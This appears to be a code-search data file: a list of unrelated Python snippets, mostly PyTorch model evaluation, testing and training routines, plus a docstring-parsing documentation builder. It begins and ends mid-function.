indent=2))\n self.root = root\n self.version = version\n subs = module_conf.get(\"submodules\", [])\n extra_from_conf = [root + \".\" + s for s in subs]\n for name in extra_from_conf:\n x, *r = name.split(\".\")\n n0 = __import__(name)\n for sub in r:\n n0 = getattr(n0, sub)\n modules.append(n0)\n\n # print(modules)\n\n collector = DFSCollector(modules[0], modules[1:])\n collected: Dict[str, Any] = collector.items()\n\n # collect all items we want to document.\n for qa, item in collected.items():\n if (nqa := full_qual(item)) != qa:\n print(\"after import qa differs : {qa} -> {nqa}\")\n if collected[nqa] == item:\n print(\"present twice\")\n del collected[nqa]\n else:\n print(\"differs: {item} != {other}\")\n\n for target in module_conf.get(\"exclude\", []):\n print(\"exclude tgt:\", target)\n del collected[target]\n # p = nullcontext\n with p() as p2:\n\n # just nice display of progression.\n taskp = p2.add_task(description=\"parsing\", total=len(collected))\n\n for qa, target_item in collected.items():\n short_description = (qa[:19] + \"..\") if len(qa) > 21 else qa\n p2.update(taskp, description=short_description.ljust(17))\n p2.advance(taskp)\n item_docstring = target_item.__doc__\n\n # TODO: we may not want tosip items as they may have children\n # right now keep modules, but we may want to keep classes if\n # they have documented descendants.\n\n if item_docstring is None and not isinstance(target_item, ModuleType):\n continue\n elif item_docstring is None and isinstance(target_item, ModuleType):\n item_docstring = \"\"\"This module has no documentation\"\"\"\n\n # progress.console.print(qa)\n try:\n if tsparse is None:\n print(\n \"please see how to install Tree-sitter in the readme to parse complex RST documents\"\n )\n arbitrary = tsparse(dedent_but_first(item_docstring).encode())\n except Exception as e:\n print(f\"TS could not parse: {qa}\")\n raise ValueError(f\"from {qa}\") from e\n arbitrary = []\n # raise\n try:\n ndoc = NumpyDocString(dedent_but_first(item_docstring))\n except Exception:\n if not isinstance(target_item, ModuleType):\n p2.console.print(\n \"Unexpected error parsing\",\n target_item,\n target_item.__name__,\n )\n if isinstance(target_item, ModuleType):\n # from .take2 import main\n # main(item_docstring)\n ndoc = NumpyDocString(\n f\"Was not able to parse docstring for {qa}\"\n )\n else:\n continue\n if not isinstance(target_item, ModuleType):\n arbitrary = []\n execute_exclude_patterns = module_conf.get(\n \"execute_exclude_patterns\", None\n )\n ex = exec_\n if execute_exclude_patterns and exec_:\n for pat in execute_exclude_patterns:\n if qa.startswith(pat):\n ex = False\n break\n # else:\n # print(\"will run\", qa)\n\n try:\n doc_blob, figs = self.do_one_item(\n target_item, ndoc, infer, ex, qa, config=module_conf\n )\n doc_blob.arbitrary = arbitrary\n except Exception:\n raise\n if module_conf.get(\"exec_failure\", None) == \"fallback\":\n print(\"Re-analysing \", qa, \"without execution\")\n # debug:\n doc_blob, figs = self.do_one_item(\n target_item, ndoc, infer, False, qa, config=module_conf\n )\n doc_blob.aliases = collector.aliases[qa]\n\n # processing....\n doc_blob.signature = doc_blob.content.pop(\"Signature\")\n try:\n for section in [\"Extended Summary\", \"Summary\", \"Notes\", \"Warnings\"]:\n if section in doc_blob.content:\n if data := doc_blob.content[section]:\n PX = P2(data)\n doc_blob.content[section] = Section(PX)\n else:\n doc_blob.content[section] = Section()\n except Exception as e:\n raise type(e)(f\"during {qa}\")\n\n doc_blob.references = doc_blob.content.pop(\"References\")\n if isinstance(doc_blob.references, str):\n if doc_blob.references == \"\":\n doc_blob.references = None\n else:\n assert False\n doc_blob.references = list(doc_blob.references)\n assert (\n isinstance(doc_blob.references, list) or doc_blob.references is None\n )\n del doc_blob.content[\"Examples\"]\n del doc_blob.content[\"index\"]\n sections_ = [\n \"Parameters\",\n \"Returns\",\n \"Raises\",\n \"Yields\",\n \"Attributes\",\n \"Other Parameters\",\n \"Warns\",\n ##\"Warnings\",\n \"Methods\",\n # \"Summary\",\n \"Receives\",\n ]\n from .take2 import Param\n\n # new_doc_blob._content[\"Parameters\"] = [\n # Parameter(a, b, c)\n # for (a, b, c) in new_doc_blob._content.get(\"Parameters\", [])\n # ]\n\n for s in sections_:\n if s in doc_blob.content:\n assert isinstance(\n doc_blob.content[s], list\n ), f\"{s}, {doc_blob.content[s]} \"\n new_content = Section()\n for param, type_, desc in doc_blob.content[s]:\n assert isinstance(desc, list)\n items = []\n if desc:\n items = P2(desc)\n new_content.append(Param(param, type_, items))\n doc_blob.content[s] = new_content\n\n doc_blob.see_also = []\n if see_also := doc_blob.content.get(\"See Also\", None):\n for nts, d0 in see_also:\n try:\n d = d0\n for (name, type_or_description) in nts:\n if type_or_description and not d:\n desc = type_or_description\n if isinstance(desc, str):\n desc = [desc]\n assert isinstance(desc, list)\n desc = paragraphs(desc)\n type_ = None\n else:\n desc = d0\n type_ = type_or_description\n assert isinstance(desc, list)\n desc = paragraphs(desc)\n\n sai = SeeAlsoItem(Ref(name, None, None), desc, type_)\n doc_blob.see_also.append(sai)\n del desc\n del type_\n except Exception as e:\n raise ValueError(\n f\"Error {qa}: {see_also=} | {nts=} | {d0=}\"\n ) from e\n del doc_blob.content[\"See Also\"]\n\n for k, v in doc_blob.content.items():\n assert isinstance(v, Section), f\"{k} is not a section {v}\"\n # end processing\n\n self.put(qa, json.dumps(doc_blob.to_json(), indent=2))\n for name, data in figs:\n self.put_raw(name, data)\n\n found = {}\n not_found = []\n for k, v in collector.aliases.items():\n if [item for item in v if item != k]:\n if shorter := find_cannonical(k, v):\n found[k] = shorter\n else:\n not_found.append((k, v))\n\n if logo := module_conf.get(\"logo\", None):\n self.put_raw(\"logo.png\", Path(logo).read_bytes())\n self.metadata = {\n \"version\": version,\n \"logo\": \"logo.png\",\n \"aliases\": found,\n \"module\": root,\n }", "def test():\n return _make_modules(is_train=False)", "def may_transfer_modules_optims(modules_and_or_optims, device_id=-1):\n for item in modules_and_or_optims:\n if isinstance(item, torch.optim.Optimizer):\n transfer_optim_state(item.state, device_id=device_id)\n elif isinstance(item, torch.nn.Module):\n if device_id == -1:\n item.cpu()\n else:\n item.cuda(device=device_id)\n elif item is not None:\n print('[Warning] Invalid type {}'.format(item.__class__.__name__))", "def may_transfer_modules_optims(modules_and_or_optims, device_id=-1):\n for item in modules_and_or_optims:\n if isinstance(item, torch.optim.Optimizer):\n transfer_optim_state(item.state, device_id=device_id)\n elif isinstance(item, torch.nn.Module):\n if device_id == -1:\n item.cpu()\n else:\n item.cuda(device_id=device_id)\n elif item is not None:\n print '[Warning] Invalid type {}'.format(item.__class__.__name__)", "def evaluate():\n model.eval()\n with torch.no_grad():\n loss, n = 0, 0\n for xb, yb in valid_dl:\n n += len(xb)\n loss += loss_func(model(xb), yb) * len(xb)\n\n return loss/n", "def evaluate(val_loader, model, epoch, cfg):\n if distributed.is_master_proc():\n print('-' * 89)\n print('Evaluation on val set epoch {:5d}'.format(epoch))\n print('-' * 89)\n \n # Enable eval mode.\n model.eval()\n sigmoid = nn.Sigmoid()\n\n # Use cuda if available\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n instances_iou = []\n pbar = tqdm(total=len(val_loader))\n for (batch_idx, (caption, boxes, instances, mask_features, annotations, ann_types, ann_categories, noun_phrases, grounding_instances, image_info)) in enumerate(val_loader):\n boxes = boxes.to(device)\n instances = instances.to(device)\n mask_features = mask_features.to(device)\n annotations = annotations.to(device)\n ann_types = ann_types.to(device)\n ann_categories = ann_categories.to(device)\n noun_phrases = noun_phrases.to(device)\n grounding_instances = grounding_instances.to(device)\n height = image_info['height'].to(device)\n width = image_info['width'].to(device)\n \n # Perform the forward pass\n scores = model(caption, boxes, mask_features, noun_phrases)\n\n if cfg.NUM_GPUS > 1:\n scores, grounding_instances, annotations, instances = distributed.all_gather(\n [scores, grounding_instances, annotations, instances]\n )\n height, width = distributed.all_gather(\n [height, width]\n )\n\n # Evaluation\n words_mask = ann_types == 1\n\n scores = torch.bmm(noun_phrases.transpose(1, 2), scores)\n scores = scores / (noun_phrases.sum(dim=1).unsqueeze(dim=2).repeat(1, 1, scores.shape[2]) + 0.0000001)\n \n scores = sigmoid(scores)\n index = torch.argmax(scores, dim=2).cpu().numpy()\n predictions = instances[torch.arange(instances.shape[0]).unsqueeze(-1), index]\n predictions = predictions[words_mask]\n targets = grounding_instances[words_mask]\n words_index = words_mask.nonzero()\n\n if len(predictions.shape) < 3:\n predictions = predictions.unsqueeze(0)\n targets = targets.unsqueeze(0)\n words_index = words_index.unsqueeze(0)\n\n plurals_mask = ann_types == 2\n for p in plurals_mask.nonzero():\n plural_instance = torch.zeros([predictions.shape[1], predictions.shape[2]]).to(device)\n if not cfg.TEST.ORACLE:\n plural_instances = (scores[p[0], p[1], :] > 0.1).nonzero()\n plural_instances = plural_instances.squeeze() if len(plural_instances.shape) > 1 else plural_instances\n else:\n plural_instances = annotations[p[0], p[1]].nonzero().squeeze()\n if plural_instances.nelement() > 0:\n plural_instance = instances[p[0], plural_instances]\n if len(plural_instance.shape) == 3:\n plural_instance, _ = plural_instance.max(dim=0)\n predictions = torch.cat([predictions, plural_instance.unsqueeze(0)])\n targets = torch.cat([targets, grounding_instances[p[0], p[1]].unsqueeze(0)])\n words_index = torch.cat([words_index, p.unsqueeze(0)])\n\n for p, t, (i, _) in zip(predictions, targets, words_index):\n mask_transform = Resize((int(height[i].cpu().item()), int(width[i].cpu().item())))\n p = mask_transform(p.unsqueeze(dim=0)).squeeze()\n t = mask_transform(t.unsqueeze(dim=0)).squeeze()\n _, _, instance_iou = compute_mask_IoU(p, t)\n instances_iou.append(instance_iou.cpu().item())\n\n if distributed.is_master_proc():\n pbar.update(1)\n if batch_idx % cfg.LOG_PERIOD == 0:\n tqdm.write('acc@0.5: {:.5f} | AA: {:.5f}'.format(accuracy_score(np.ones([len(instances_iou)]), np.array(instances_iou) > 0.5), average_accuracy(instances_iou))) \n\n pbar.close()\n\n # Final evaluation metrics\n AA = average_accuracy(instances_iou)\n accuracy = accuracy_score(np.ones([len(instances_iou)]), np.array(instances_iou) > 0.5)\n if distributed.is_master_proc():\n print('| epoch {:5d} | final acc@0.5: {:.5f} | final AA: {:.5f} |'.format(\n epoch,\n accuracy,\n AA))\n return AA", "def initialize_training_false_recursive(module: Module) -> Module:\n if isinstance(module, (BatchNorm1d, BatchNorm2d, BatchNorm3d)):\n initialize_batch_norm_eval(module)\n else:\n for module_child in module.children():\n initialize_training_false_recursive(module_child)\n return module.train(False)", "def set_models_eval(self):\n raise NotImplementedError", "def run_evaluation(net, loader):\n net.net.eval()\n losses_eval = {}\n for i, batch in enumerate(loader):\n with torch.no_grad():\n losses_batch = net.compute_loss(*batch, eval=True)\n append_losses(losses_eval, losses_batch)\n net.net.train()\n return losses_eval", "def initialize(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\n nn.init.xavier_normal_(m.weight)\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)", "def _set_eval(self):\n\n if self.model.__dict__['training']:\n self.model.eval()", "def eval(self, test_loader):\n\n self.generator.eval()\n self.discriminator.eval()\n\n # Total correct prediction counts.\n correct = inpainted_correct = real_correct = 0\n\n m1, m2 = masks(test_loader)\n with torch.no_grad():\n for real_images, _ in test_loader:\n real_images = real_images.to('cuda')\n batch_size = real_images.size()[0]\n\n # Correct prediction counts in the batch.\n batch_inpainted_correct = batch_real_correct = 0\n\n # Generate inpainted images.\n inpainted_images = self.generator(real_images*m1 - m2)\n\n # Get predictions on real images.\n real_logits = self.discriminator(real_images)\n real_predictions = torch.sigmoid(real_logits).round()\n\n # Get target labels for real images.\n real_target = torch.ones(batch_size, device='cuda')\n real_target = real_target.view_as(real_predictions)\n\n # Check number of correct predictions on real images.\n batch_real_correct = (\n real_predictions.eq(real_target).sum()\n )\n real_correct += batch_real_correct.item()\n\n # Get predictions on inpainted images.\n inpainted_logits = self.discriminator(inpainted_images)\n inpainted_predictions = (\n torch.sigmoid(inpainted_logits).round()\n )\n\n # Get target labels for inpainted images.\n inpainted_target = (\n torch.zeros(batch_size, device='cuda')\n )\n inpainted_target = (\n inpainted_target.view_as(inpainted_predictions)\n )\n\n # Check number of correct predictions on inpainted.\n batch_inpainted_correct = (\n inpainted_predictions.eq(inpainted_target).sum()\n )\n inpainted_correct += batch_inpainted_correct.item()\n\n # Get total number of correct predictions.\n correct += real_correct + inpainted_correct\n\n # Log results.\n msg = (\n '\\nTest set: Accuracy: {}/{} ({:.0f}%)'\n '\\tInpainted correct: {}\\tReal correct: {}\\n'\n )\n msg = msg.format(\n correct,\n 2*len(test_loader.dataset),\n 100. * correct / (2*len(test_loader.dataset)),\n inpainted_correct,\n real_correct\n )\n logger.info(msg)\n\n # Save some inpainted images.\n real_images, _ = next(iter(test_loader))\n real_images = real_images.to('cuda')\n filename = os.path.join(\n self.args.output_dir,\n 'images',\n f'epoch_{self.epochs}_original.jpg'\n )\n save_image(\n tensor=real_images,\n filename=filename,\n normalize=True,\n scale_each=True,\n nrow=10\n )\n\n masked_images = m1*real_images - m2\n filename = os.path.join(\n self.args.output_dir,\n 'images',\n f'epoch_{self.epochs}_masked.jpg'\n )\n save_image(\n tensor=masked_images,\n filename=filename,\n normalize=True,\n scale_each=True,\n nrow=10\n )\n\n inpainted_images = self.generator(masked_images)\n filename = os.path.join(\n self.args.output_dir,\n 'images',\n f'epoch_{self.epochs}_inpainted.jpg'\n )\n save_image(\n tensor=inpainted_images,\n filename=filename,\n normalize=True,\n scale_each=True,\n nrow=10\n )", "def test(self):\n with torch.no_grad():\n self.model.eval()\n p10_forecast, p10_forecast, p90_forecast, target = None, None, None, None\n\n t = time()\n for step, sample in enumerate(self.test_loader):\n\n # Hide future predictions from input vector, set to 0 (or 1) values where timestep > encoder_steps\n steps = self.cnf.all_params['num_encoder_steps']\n pred_len = sample['outputs'].shape[1]\n x = sample['inputs'].float().to(self.cnf.device)\n x[:, steps:, 0] = 1\n\n # Feed input to the model\n if self.cnf.all_params[\"model\"] == \"transformer\" or self.cnf.all_params[\"model\"] == \"grn_transformer\":\n\n # Auto-regressive prediction\n for i in range(pred_len):\n output = self.model.forward(x)\n x[:, steps + i, 0] = output[:, i, 1]\n output = self.model.forward(x)\n\n elif self.cnf.all_params[\"model\"] == \"tf_transformer\":\n output, _, _ = self.model.forward(x)\n else:\n raise NameError\n\n output = output.squeeze()\n y, y_pred = sample['outputs'].squeeze().float().to(self.cnf.device), output\n\n # Compute loss\n loss, _ = self.loss(y_pred, y)\n smape = symmetric_mean_absolute_percentage_error(output[:, :, 1].detach().cpu().numpy(),\n sample['outputs'][:, :, 0].detach().cpu().numpy())\n\n # De-Normalize to compute metrics\n target = unnormalize_tensor(self.data_formatter, y, sample['identifier'][0][0])\n p10_forecast = unnormalize_tensor(self.data_formatter, y_pred[..., 0], sample['identifier'][0][0])\n p50_forecast = unnormalize_tensor(self.data_formatter, y_pred[..., 1], sample['identifier'][0][0])\n p90_forecast = unnormalize_tensor(self.data_formatter, y_pred[..., 2], sample['identifier'][0][0])\n\n # Compute metrics\n self.test_losses['p10'].append(self.loss.numpy_normalised_quantile_loss(p10_forecast, target, 0.1))\n self.test_losses['p50'].append(self.loss.numpy_normalised_quantile_loss(p50_forecast, target, 0.5))\n self.test_losses['p90'].append(self.loss.numpy_normalised_quantile_loss(p90_forecast, target, 0.9))\n\n self.test_loss.append(loss.item())\n self.test_smape.append(smape)\n\n # Plot serie prediction\n p1, p2, p3, target = np.expand_dims(p10_forecast, axis=-1), np.expand_dims(p50_forecast, axis=-1), \\\n np.expand_dims(p90_forecast, axis=-1), np.expand_dims(target, axis=-1)\n p = np.concatenate((p1, p2, p3), axis=-1)\n plot_temporal_serie(p, target)\n\n # Log stuff\n for k in self.test_losses.keys():\n mean_test_loss = np.mean(self.test_losses[k])\n print(f'\\t● AVG {k} Loss on TEST-set: {mean_test_loss:.6f} │ T: {time() - t:.2f} s')\n\n # log log log\n mean_test_loss = np.mean(self.test_loss)\n mean_smape = np.mean(self.test_smape)\n print(f'\\t● AVG Loss on TEST-set: {mean_test_loss:.6f} │ T: {time() - t:.2f} s')\n print(f'\\t● AVG SMAPE on TEST-set: {mean_smape:.6f} │ T: {time() - t:.2f} s')", "def test_image():\n def get_images_name(folder):\n \"\"\"Create a generator to list images name at evaluation time\"\"\"\n onlyfiles = [f for f in os.listdir(folder) if os.path.isfile(os.path.join(folder, f))]\n for f in onlyfiles:\n yield f\n\n def pil_loader(path):\n \"\"\"Load images from /eval/ subfolder, convert to greyscale and resized it as squared\"\"\"\n with open(path, 'rb') as f:\n with Image.open(f) as img:\n sqrWidth = np.ceil(np.sqrt(img.size[0]*img.size[1])).astype(int)\n return img.convert('L').resize((sqrWidth, sqrWidth))\n\n eval_loader = torch.utils.data.DataLoader(ImageFolder(root=args.evalf, transform=transforms.Compose([\n transforms.Resize(28),\n transforms.CenterCrop(28),\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ]), loader=pil_loader), batch_size=1, **kwargs)\n\n # Name generator\n names = get_images_name(os.path.join(args.evalf, \"images\"))\n model.eval()\n with torch.no_grad():\n for data, target in eval_loader:\n data, target = data.to(device), target.to(device)\n output = model(data)\n label = output.argmax(dim=1, keepdim=True).item()\n print (\"Images: \" + next(names) + \", Classified as: \" + str(label))", "def test(model, data_loader, num_train_batches, epoch, test_mloss, test_rloss, test_acc, directory):\r\n print('===> Evaluate mode')\r\n\r\n # Switch to evaluate mode\r\n model.eval()\r\n\r\n if args.cuda:\r\n # When we wrap a Module in DataParallel for multi-GPUs\r\n model = model.module\r\n\r\n loss = 0\r\n margin_loss = 0\r\n recon_loss = 0\r\n\r\n correct = 0\r\n\r\n num_batches = len(data_loader)\r\n\r\n global_step = epoch * num_train_batches + num_train_batches\r\n\r\n start_time = timer()\r\n\r\n for data, target in data_loader:\r\n with torch.no_grad():\r\n batch_size = data.size(0)\r\n target_indices = target\r\n target_one_hot = utils.one_hot_encode(target_indices, length=args.num_classes)\r\n assert target_one_hot.size() == torch.Size([batch_size, 10])\r\n\r\n target = target_one_hot\r\n\r\n if args.cuda:\r\n data = data.to(args.device)\r\n target = target.to(args.device)\r\n target_indices.to(args.device)\r\n\r\n # Output predictions\r\n output, reconstruction = model(data, target_indices, False) # output from DigitCaps (out_digit_caps)\r\n\r\n # Sum up batch loss\r\n t_loss, m_loss, r_loss = loss_func(\r\n output, target, args.regularization_scale, reconstruction, data, args.device, batch_size)\r\n loss += t_loss.data\r\n margin_loss += m_loss.data\r\n recon_loss += r_loss.data\r\n\r\n # Count number of correct predictions\r\n # v_magnitude shape: [128, 10, 1, 1]\r\n v_magnitude = torch.sqrt((output**2).sum(dim=2, keepdim=True))\r\n # pred shape: [128, 1, 1, 1]\r\n pred = v_magnitude.data.max(1, keepdim=True)[1].cpu()\r\n correct += pred.eq(target_indices.view_as(pred)).sum()\r\n\r\n\r\n # Get the reconstructed images of the last batch\r\n if args.use_reconstruction_loss:\r\n reconstruction = model.decoder(output, target_indices, False)\r\n # Input image size and number of channel.\r\n # By default, for MNIST, the image width and height is 28x28 and 1 channel for black/white.\r\n image_width = args.input_width\r\n image_height = args.input_height\r\n image_channel = args.num_conv_in_channels\r\n recon_img = reconstruction.view(-1, image_channel, image_width, image_height)\r\n assert recon_img.size() == torch.Size([batch_size, image_channel, image_width, image_height])\r\n\r\n # Save the image into file system\r\n utils.save_image(recon_img, directory / ('recons_image_test_{}_{}.png'.format(epoch, global_step)))\r\n utils.save_image(data, directory /\r\n ('original_image_test_{}_{}.png'.format(epoch, global_step)))\r\n\r\n end_time = timer()\r\n\r\n # Log test losses\r\n loss /= num_batches\r\n margin_loss /= num_batches\r\n recon_loss /= num_batches\r\n\r\n # Log test accuracies\r\n num_test_data = len(data_loader.dataset)\r\n accuracy = correct / num_test_data\r\n accuracy_percentage = float(correct) * 100.0 / float(num_test_data)\r\n\r\n test_mloss.write('%.6f \\n' % margin_loss)\r\n test_rloss.write('%.6f \\n' % recon_loss)\r\n test_acc.write('%.4f \\n' % accuracy_percentage)\r\n\r\n # Print test losses and accuracy\r\n print('Test: [Loss: {:.6f},' \\\r\n '\\tMargin loss: {:.6f},' \\\r\n '\\tReconstruction loss: {:.6f}]'.format(\r\n loss,\r\n margin_loss,\r\n recon_loss if args.use_reconstruction_loss else 0))\r\n print('Test Accuracy: {}/{} ({:.2f}%)\\n'.format(\r\n correct, num_test_data, accuracy_percentage))\r\n\r\n\r\n global avg_testing_time_per_epoch\r\n avg_testing_time_per_epoch = (\r\n avg_testing_time_per_epoch * (epoch - 1) + end_time - start_time) / epoch\r\n\r\n global best_acc\r\n global best_acc_epoch\r\n if accuracy_percentage > best_acc:\r\n best_acc = accuracy_percentage\r\n best_acc_epoch = epoch\r\n test_loader = data_loader\r\n utils.dump(utils.make_full_checkpoint_obj(locals(), globals()), directory / 'trained_model/FP32_model')", "def eval(self):\n self.train(mode=False)", "def edit_model(m: T_Module, f: Callable[[nn.Module], nn.Module]) -> nn.Module:\n for name, mod in m._modules.items():\n m._modules[name] = edit_model(mod, f)\n m._modules[name] = f(mod)\n return f(m)", "def _evaluate(model):\n _recompile(model)\n if isinstance(eval_dataset, tuple):\n eval_images, eval_labels = eval_dataset\n return model.evaluate(\n eval_images, eval_labels, verbose=verbose, return_dict=True)\n else:\n return model.evaluate(eval_dataset, verbose=verbose, return_dict=True)", "def eval(self):\n # self.recognizer.eval()\n self.detector.eval()\n self.shared_conv.eval()", "def train(self, mode=True):\n super(RCRNN, self).train(mode)\n if self.freeze_bn:\n print(\"Freezing Mean/Var of BatchNorm2D.\")\n if self.freeze_bn:\n print(\"Freezing Weight/Bias of BatchNorm2D.\")\n if self.freeze_bn:\n for m in self.modules():\n if isinstance(m, nn.BatchNorm2d):\n m.eval()\n if self.freeze_bn:\n m.weight.requires_grad = False\n m.bias.requires_grad = False", "def forward(self, images):\n # pylint: disable=arguments-differ\n # The arguments will differ from the base class since nn.Module is an abstract class.\n\n with torch.no_grad():\n latent = self.resnet(images).squeeze()\n features = self.bn(self.fc(latent))\n return features", "def compute(self) -> None:\n \n self.model.eval()\n \n with torch.no_grad():\n for (input, target, _) in self.loader:\n\n # self.model = self.model.train(False) # TEST @lacoupe\n output, _ = self.model(input)\n \n output = (output >= 0.5)\n \n for out, tar in zip(output, target):\n \n tar = bool(tar)\n \n if out and tar:\n self.confusion['true_positive'] += 1\n elif not out and not tar:\n self.confusion['true_negative'] += 1\n elif out and not tar:\n self.confusion['false_positive'] += 1\n elif not out and tar:\n self.confusion['false_negative'] += 1\n \n self.accuracy = (self.confusion['true_positive'] + self.confusion['true_negative']) \\\n / sum(list(self.confusion.values()))\n \n if (self.confusion['true_positive'] + self.confusion['false_positive']) == 0.:\n self.precision = 0.\n else:\n self.precision = self.confusion['true_positive'] \\\n / (self.confusion['true_positive'] + self.confusion['false_positive'])\n \n if (self.confusion['true_positive'] + self.confusion['false_negative']) == 0.:\n self.recall = 0.\n else:\n self.recall = self.confusion['true_positive'] \\\n / (self.confusion['true_positive'] + self.confusion['false_negative'])\n \n if (self.precision + self.recall) == 0.:\n self.f1_score = 0.\n else:\n self.f1_score = 2 * self.precision * self.recall / (self.precision + self.recall)", "def evaluate_model(self):\r\n self.model.eval() # sets layers to eval mode (e.g. norm, dropout)\r\n with torch.no_grad(): # deactivates autograd engine\r\n\r\n # generate graphs required for model evaluation\r\n # note that evaluation of the generated graphs happens in\r\n # `generate_graphs()`, and molecules are saved as `self` attributes\r\n self.generate_graphs(n_samples=self.C.n_samples, evaluation=True)\r\n\r\n print(\"* Evaluating model.\", flush=True)\r\n anal.evaluate_model(valid_dataloader=self.valid_dataloader,\r\n train_dataloader=self.train_dataloader,\r\n nll_per_action=self.nll_per_action,\r\n model=self.model)\r\n\r\n self.nll_per_action = None # don't need anymore\r\n\r\n print(f\"* Saving model state at Epoch {self.current_epoch}.\", flush=True)\r\n\r\n # `pickle.HIGHEST_PROTOCOL` good for large objects\r\n model_path_and_filename = (self.C.job_dir + f\"model_restart_{self.current_epoch}.pth\")\r\n torch.save(obj=self.model,\r\n f=model_path_and_filename,\r\n pickle_protocol=pickle.HIGHEST_PROTOCOL)", "def cuda(self):\n for i in self.modules:\n if torch.cuda.is_available():\n self.modules[i] = self.modules[i].cuda()", "def find_best_module_for_attributions(model, module):\n modules = list(model.modules())\n try:\n current_idx = modules.index(module)\n eval_module = module\n for next_module in modules[current_idx+1:]:\n if isinstance(next_module, _BatchNorm):\n print(f\"BatchNorm detected: shifting evaluation after {next_module}\")\n eval_module = next_module\n elif any([isinstance(next_module, t) for t in ACTIVATIONS]):\n print(f\"Activation detected: shifting evaluation after {next_module}\")\n eval_module = next_module\n else:\n return eval_module\n except ValueError:\n logging.error(\"Provided module is not in model\")\n return module", "def _init_modules(self, pretrained_weights=None):\n if pretrained_weights is None:\n if cfg.MODEL.LOAD_PRETRAINED_BACKBONE_WEIGHTS:\n print(\"\\n-------------------------------------------\")\n print(\"Load pre-trained ImageNet weights\")\n print(\"\\n-------------------------------------------\")\n weight_utils.load_caffe2_pretrained_weights(self, cfg.MODEL.PRETRAINED_BACKBONE_WEIGHTS)\n return\n\n pretrained_detectron = torch.load(pretrained_weights)\n\n if cfg.RPN.RPN_ON:\n load_layers = ['Conv_Body', 'RPN']\n else:\n load_layers = ['Conv_Body']\n\n mapping, _ = self.detectron_weight_mapping()\n state_dict = {}\n ckpt = pretrained_detectron['model']\n for name in ckpt:\n if name.split('.')[0] in load_layers:\n if mapping[name]:\n state_dict[name] = ckpt[name]\n self.load_state_dict(state_dict, strict=False)\n del pretrained_detectron\n torch.cuda.empty_cache()", "def test(model, test_loader, device):\n model.eval()\n test_loss = 0\n accuracy = 0\n with torch.no_grad():\n for inputs, labels in test_loader:\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n output = model.forward(inputs)\n\n # Calculate accuracy\n ps = torch.exp(output)\n top_p, top_class = ps.topk(1, dim=1)\n equals = top_class == labels.view(*top_class.shape)\n accuracy += torch.mean(equals.type(torch.FloatTensor)).item()\n\n print(f\"Accuracy on test set is: {accuracy/len(test_loader):.3f}\")", "def train(self, mode=True, freeze_bn=False):\n super(NetFeat, self).train(mode)\n self.freeze_bn = freeze_bn\n if self.freeze_bn:\n for m in self.modules():\n if isinstance(m, nn.BatchNorm2d):\n m.eval()\n m.weight.requires_grad = False\n m.bias.requires_grad = False", "def get_adversary_models(self, mode: str) -> List[torch.nn.Module]:\n pass", "def test_single_pytorch_module_mapping_to_many_onnx_nodes(self):\n\n AimetLogger.set_level_for_all_areas(logging.DEBUG)\n\n class TwoLayerLstmModel(torch.nn.Module):\n \"\"\"\n Model using torch.nn.LSTM module\n \"\"\"\n def __init__(self):\n super(TwoLayerLstmModel, self).__init__()\n self.lstm = torch.nn.LSTM(input_size=3, hidden_size=5, num_layers=3)\n\n def forward(self, x, hx=None):\n return self.lstm(x, hx)\n\n model_name = 'multilayer_lstm'\n model = TwoLayerLstmModel()\n dummy_input = torch.randn(10, 1, 3)\n\n torch.onnx.export(model, dummy_input, './data/' + model_name + '.onnx')\n onnx_utils.OnnxSaver.set_node_names('./data/' + model_name + '.onnx', model, dummy_input, is_conditional=False,\n module_marker_map={})\n onnx_model = onnx.load('./data/' + model_name + '.onnx')\n\n lstm_nodes = [node for node in onnx_model.graph.node if node.op_type == 'LSTM']\n assert 3 == len(lstm_nodes)\n\n node_to_io_dict, _ = onnx_utils.OnnxSaver.get_onnx_node_to_io_tensor_names_map(onnx_model)\n assert isinstance(node_to_io_dict['lstm#root_node'], list)\n assert 3 == len(node_to_io_dict['lstm#root_node'])", "def __call__(self, manager=None):\n # set up a reporter\n reporter = reporting.Reporter()\n if self.name is not None:\n prefix = self.name + '/'\n else:\n prefix = ''\n for name, target in self._targets.items():\n reporter.add_observer(prefix + name, target)\n reporter.add_observers(prefix + name,\n target.named_modules())\n\n with reporter:\n with torch.no_grad():\n result = self.evaluate()\n\n reporting.report(result)\n return result", "def run_performance( pkg_mod_iter ):\n for package, module_iter in pkg_mod_iter:\n print( package )\n print( \"=\"*len(package ) )\n print()\n for filename, modname in module_iter:\n print( filename, modname )\n try:\n module= __import__( package+\".\"+modname, fromlist=(modname,\"performance\") )\n module.performance()\n except AttributeError:\n pass # no performance() function in the module.", "def train(self, mode=True):\n super(CRNN, self).train(mode)\n if self.freeze_bn:\n print(\"Freezing Mean/Var of BatchNorm2D.\")\n if self.freeze_bn:\n print(\"Freezing Weight/Bias of BatchNorm2D.\")\n if self.freeze_bn:\n for m in self.modules():\n if isinstance(m, nn.BatchNorm2d):\n m.eval()\n if self.freeze_bn:\n m.weight.requires_grad = False\n m.bias.requires_grad = False", "def _test(self):\n self.pytorch_layer.eval()\n pytorch_layer = copy.deepcopy(self.pytorch_layer).cpu()\n image_w_h = int(self.input_size ** 0.5)\n input_image = torch.rand(1, self.n_in_channels, image_w_h, image_w_h)\n output_tensor = pytorch_layer(input_image)[0]\n for channel in range(self.n_in_channels):\n current_channel = input_image[0, channel].squeeze().flatten().cpu().numpy()\n normalized_data = (current_channel - self.running_mean[channel]) / np.sqrt(\n self.running_var[channel] + self.epsilon\n )\n if self.affine:\n output_numpy = (self.weights[channel] * normalized_data) + self.bias[\n channel\n ]\n else:\n output_numpy = normalized_data\n\n assert np.isclose(\n output_numpy,\n output_tensor[channel].detach().flatten().cpu().numpy(),\n atol=1e-6,\n ).all()", "def eval_net(net, loader, device, batch_size, threshold):\n net.eval()\n dice = 0\n acc_score = 0\n rec_score = 0\n f1_score = 0\n pres_score = 0\n jacc_score = 0\n\n for batch in loader:\n imgs = batch['image']\n true_masks = batch['mask']\n\n imgs = imgs.to(device=device, dtype=torch.float32)\n mask_type = torch.float32 if net.n_classes == 1 else torch.long\n true_masks = true_masks.to(device=device, dtype=mask_type)\n\n mask_pred = net(imgs)\n\n for true_mask, pred in 